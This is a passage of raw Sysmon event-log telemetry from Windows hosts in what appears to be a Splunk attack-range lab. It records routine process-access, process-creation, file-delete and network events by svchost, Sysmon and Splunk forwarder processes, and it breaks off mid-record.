10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1275-6216-7404-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1275-6216-7404-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.511{4F8D34B0-1275-6216-7404-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.244{4F8D34B0-1274-6216-7304-000000003902}27961316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1274-6216-7304-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:46.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF95668C7C5B2B97A0463431E361E8D,SHA256=323896C1E77463ED34BD0ECAEB46C8A56C70E7448717D57C7B223FB7681777D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:46.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3BA33707B9B4A0B374E0F0548C2E13,SHA256=4DF28A146E0D7CBCC0F51BA3EB6B0830AC76411187E50FBAE7A5A7CCDB9AD44A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:46.088{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:46.056{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF73E0CF39BDF1AC9A3BE17C8DBB1DE2,SHA256=9F669932A820819F0228EB71E52A4BB6898A063F700EBE823D0CBDA5AE43B3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:46.056{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07D452B2CD000D1EDBCA795E49347567,SHA256=F52F1C238EBB83B47F7DAF60A1E6D1FFA4CBCD8BAFDE79B69E1692DEF390DF22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DFF25F344F6A1F79BC26DD23C4EB29,SHA256=FAD870611245BD1C86D1797A8D5719EC2112912BCEFA24D954FAFCCDC49434AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:45.645{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53535-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:47.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E058C78AB2D98834D09B165EC795560,SHA256=CDBFF49F75584564BD9C91C4D8A815FF261BDAD00175AF8D71BFC5B364012DD9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1277-6216-7604-000000003902}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1277-6216-7604-000000003902}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.712{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1277-6216-7604-000000003902}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.713{4F8D34B0-1277-6216-7604-000000003902}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 